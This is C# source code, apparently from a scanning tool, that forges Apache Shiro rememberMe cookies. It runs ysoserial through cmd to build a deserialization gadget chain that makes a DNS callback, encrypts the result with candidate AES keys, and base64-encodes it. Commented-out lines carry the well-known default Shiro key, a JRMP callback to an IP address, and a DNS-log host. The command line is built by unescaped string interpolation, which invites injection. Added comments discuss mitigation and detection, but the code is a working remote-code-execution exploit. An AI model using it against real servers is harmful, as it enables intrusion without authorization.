        // Build the rememberMe cookie value
        /// <summary>
        /// Builds a Shiro-style <c>rememberMe=</c> cookie value for one (key, gadget) pair:
        /// runs <c>ysoserial.jar</c> through <c>cmd /c</c> so that the serialized gadget chain
        /// lands in <c>{moduleValue}.ser</c>, AES-encrypts that file with
        /// <paramref name="keyValue"/> via Shiro's <c>AesCipherService</c>, and base64-encodes
        /// the ciphertext.
        /// Defender note: the weakness this exercises is a rememberMe key that is fixed or
        /// guessable (the original comment below speaks of looping over keys); a random,
        /// per-deployment key is the mitigation. The embedded command is
        /// <c>ping {moduleKey}.{keyKey}.{dnslogDomain}</c>, so a successful trigger is expected
        /// to show up as an outbound DNS lookup for that exact name — a usable detection signal.
        /// </summary>
        /// <param name="keyValue">Base64-encoded AES key candidate; decoded with <see cref="Convert.FromBase64String(string)"/>.</param>
        /// <param name="keyKey">Label spliced into the callback hostname (presumably to tell key candidates apart in DNS logs).</param>
        /// <param name="moduleValue">ysoserial gadget/module name; also the name of the output file <c>{moduleValue}.ser</c>.</param>
        /// <param name="moduleKey">Label spliced into the callback hostname (presumably to tell modules apart).</param>
        /// <param name="dnslogDomain">Domain that receives the DNS callback.</param>
        /// <returns>The string <c>"rememberMe=" + base64(ciphertext)</c>.</returns>
        public static string get_rememberMe(string keyValue, string keyKey, string moduleValue, string moduleKey, string dnslogDomain)
        {
            // Generate a serialized file; work is split per module on separate threads, and the
            // file is named after the module to avoid clashes between them.
            Process p = new Process();

            p.StartInfo.FileName = "cmd";
            //p.StartInfo.Arguments = @"/c java -jar ysoserial.jar JRMPClient ""101.201.56.18:999"" > payload.ser";
            //p.StartInfo.Arguments = @"/c java -jar ysoserial.jar CommonsCollections2 ""ping cc1.k2.65hos5.ceye.io"" > payload.ser";
            // The command line is assembled by plain string interpolation: none of the
            // parameters are quoted or escaped for cmd, so they must come from a trusted source.
            p.StartInfo.Arguments = $@"/c java -jar ysoserial.jar {moduleValue} ""ping {moduleKey}.{keyKey}.{dnslogDomain}"" > {moduleValue}.ser";
            //Console.WriteLine($"{moduleKey}.{keyKey}.{dnslogDomain}");
            p.StartInfo.UseShellExecute        = false;
            p.StartInfo.RedirectStandardInput  = true;
            p.StartInfo.RedirectStandardOutput = true;
            p.StartInfo.RedirectStandardError  = true;
            p.StartInfo.CreateNoWindow         = true;
            p.Start();
            // Blocks until the child's stdout is closed, i.e. until cmd (and the java it
            // launched) has finished; the captured output itself is discarded.
            p.StandardOutput.ReadToEnd();
            p.Dispose();

            // Read the generated .ser as raw bytes. The path is relative, so it resolves
            // against this process's current directory (no WorkingDirectory was set above).
            byte[] textBytes = File.ReadAllBytes($@"{moduleValue}.ser");

            // Instantiate org.apache.shiro.crypto.AesCipherService (a Java class, presumably
            // exposed through Java interop — note the encrypt(...).getBytes() call shape).
            // No extra configuration is needed: the default is AES/128/CBC, so only the key
            // has to be iterated over.
            AesCipherService aesCipherService = new AesCipherService();

            // Base64-decode the key string into the raw key bytes.
            byte[] keyB = Convert.FromBase64String(keyValue);
            // Call Shiro's own encrypt routine and take the resulting byte array.
            byte[] encrptByte = aesCipherService.encrypt(textBytes, keyB).getBytes();
            // Base64-encode the ciphertext for use as a cookie value.
            string encrptText = Convert.ToBase64String(encrptByte);

            return("rememberMe=" + encrptText);
        }
        /// <summary>
        /// Builds a Shiro-style <c>rememberMe=</c> cookie value from a pre-generated
        /// serialized payload: reads <c>poc.ser</c> from the current directory, AES-encrypts it
        /// with the base64 key in <paramref name="keyS"/> via Shiro's <c>AesCipherService</c>,
        /// and base64-encodes the ciphertext.
        /// Defender note: the commented-out line below hard-codes a literal key. A fixed key
        /// shared across deployments is what makes this cookie forgery possible; the mitigation
        /// is a randomly generated key unique to each deployment, and rotation if a leak is
        /// suspected.
        /// </summary>
        /// <param name="keyS">Base64-encoded AES key; decoded with <see cref="Convert.FromBase64String(string)"/>.</param>
        /// <returns>The string <c>"rememberMe=" + base64(ciphertext)</c>.</returns>
        public static string getRememberMe(string keyS)
        {
            // Read poc.ser as raw bytes; the relative path resolves against the current directory.
            byte[] textBytes = File.ReadAllBytes($@"poc.ser");

            // Instantiate org.apache.shiro.crypto.AesCipherService (a Java class, presumably
            // exposed through Java interop); no extra configuration needed, default is AES/128/CBC.
            AesCipherService aesCipherService = new AesCipherService();

            // Base64-decode keyS into the raw key bytes keyB.
            // byte[] key = Convert.FromBase64String("kPH+bIxk5D2deZiIxcaaaA==");
            byte[] keyB = Convert.FromBase64String(keyS);
            // Call Shiro's own encrypt routine and take the resulting byte array.
            byte[] encrptByte = aesCipherService.encrypt(textBytes, keyB).getBytes();
            // Base64-encode the ciphertext for use as a cookie value.
            string encrptText = Convert.ToBase64String(encrptByte);

            return("rememberMe=" + encrptText);
        }